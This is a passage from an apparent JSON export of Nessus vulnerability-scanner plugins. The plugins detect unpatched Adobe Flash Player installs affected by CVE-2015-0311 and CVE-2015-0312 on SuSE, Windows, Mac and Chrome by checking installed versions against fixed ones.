descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81077);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0311\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 10226)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 11.2.202.440 (bsc#914463,\nAPSA15-01, CVE-2015-0311).\n\nMore information can be found at\nhttps://helpx.adobe.com/security/products/flash-player/apsa15-01.html\n.\n\nAn update of flashplayer (executable binary) for i386 is currently not\navailable and was thus disabled.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=914463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0311.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10226.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.440-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", 
sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.440-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.440-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.440-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.440-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.440-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:05:39", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 40.0.2214.93. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. 
(CVE-2015-0312)", "edition": 26, "published": "2015-01-27T00:00:00", "title": "Google Chrome < 40.0.2214.93 Flash Player Multiple Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_40_0_2214_93.NASL", "href": "https://www.tenable.com/plugins/nessus/81020", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81020);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n\n script_name(english:\"Google Chrome < 40.0.2214.93 Flash Player Multiple Remote Code Execution\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 40.0.2214.93. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. 
(CVE-2015-0312)\");\n # http://googlechromereleases.blogspot.com/2015/01/stable-channel-update_26.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d2bec23e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 40.0.2214.93 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0312\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'40.0.2214.93', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:30:17", "description": "The version of Google Chrome installed on the remote Mac OS X host is\nprior to 40.0.2214.93. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. (CVE-2015-0312)", "edition": 26, "published": "2015-01-27T00:00:00", "title": "Google Chrome < 40.0.2214.93 Flash Player Multiple Remote Code Execution (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_40_0_2214_93.NASL", "href": "https://www.tenable.com/plugins/nessus/81021", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81021);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n\n script_name(english:\"Google Chrome < 40.0.2214.93 Flash Player Multiple Remote Code Execution (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple 
remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 40.0.2214.93. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. (CVE-2015-0312)\");\n # http://googlechromereleases.blogspot.com/2015/01/stable-channel-update_26.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d2bec23e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 40.0.2214.93 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0312\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'40.0.2214.93', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:43:09", "description": "The remote host is missing KB3035034. It is, therefore, affected by\nthe following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0312)", "edition": 28, "published": "2015-01-28T00:00:00", "title": "MS KB3035034: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB3035034.NASL", "href": "https://www.tenable.com/plugins/nessus/81046", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81046);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n script_xref(name:\"MSKB\", value:\"3035034\");\n\n 
script_name(english:\"MS KB3035034: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB3035034. It is, therefore, affected by\nthe following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0312)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/3035034/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB3035034.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0312\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', 
keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 16.0.0.296\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 16 ||\n (\n iver[0] == 16 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 296)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 16.0.0.296' +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:29:47", "description": "According to its version, the Adobe Flash Player installed on the\nremote Mac OS X host is equal or prior to 16.0.0.287. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. 
(CVE-2015-0312)", "edition": 26, "published": "2015-01-26T00:00:00", "title": "Flash Player For Mac <= 16.0.0.287 Unspecified Code Execution (APSA15-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_16_0_0_296.NASL", "href": "https://www.tenable.com/plugins/nessus/80999", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80999);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n\n script_name(english:\"Flash Player For Mac <= 16.0.0.287 Unspecified Code Execution (APSA15-01)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by\nmultiple code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Adobe Flash Player installed on the\nremote Mac OS X host is equal or prior to 16.0.0.287. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. 
(CVE-2015-0312)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/products/flashplayer/distribution3.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 16.0.0.296 or later.\n\nAlternatively, Adobe has made version 13.0.0.264 available for those\ninstallations that cannot be upgraded to 16.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0312\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"16.0.0.287\";\n fix = \"16.0.0.296\";\n}\nelse\n{\n cutoff_version = \"13.0.0.262\";\n fix = \"13.0.0.264\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T02:33:34", "description": "According to its version, the Adobe Flash Player installed on the\nremote Windows host is equal or prior to 16.0.0.287. It is, therefore,\naffected by the following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. 
(CVE-2015-0312)", "edition": 26, "published": "2015-01-26T00:00:00", "title": "Flash Player <= 16.0.0.287 Unspecified Code Execution (APSA15-01 / APSB15-03)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSA15-01.NASL", "href": "https://www.tenable.com/plugins/nessus/80998", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80998);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n\n script_name(english:\"Flash Player <= 16.0.0.287 Unspecified Code Execution (APSA15-01 / APSB15-03)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Adobe Flash Player installed on the\nremote Windows host is equal or prior to 16.0.0.287. It is, therefore,\naffected by the following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. 
(CVE-2015-0312)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/products/flashplayer/distribution3.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 16.0.0.296 or later.\n\nAlternatively, Adobe has made version 13.0.0.264 available for those\ninstallations that cannot be upgraded to 16.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0312\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 16.0.0.287\n variant == \"Chrome_Pepper\" &&\n (\n (iver[0] < 16) ||\n (iver[0] == 16 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 287)\n )\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n (\n # < 13\n (\n iver[0] < 13 ||\n # 13.0.0.x <= 13.0.0.262\n (\n iver[0] == 13 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 262\n )\n )\n )\n )\n ) ||\n # 14.0.0.x <= 16.0.0.287\n (\n iver[0] == 14 ||\n (\n iver[0] == 15 ||\n (\n iver[0] == 16 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 287\n )\n )\n )\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = 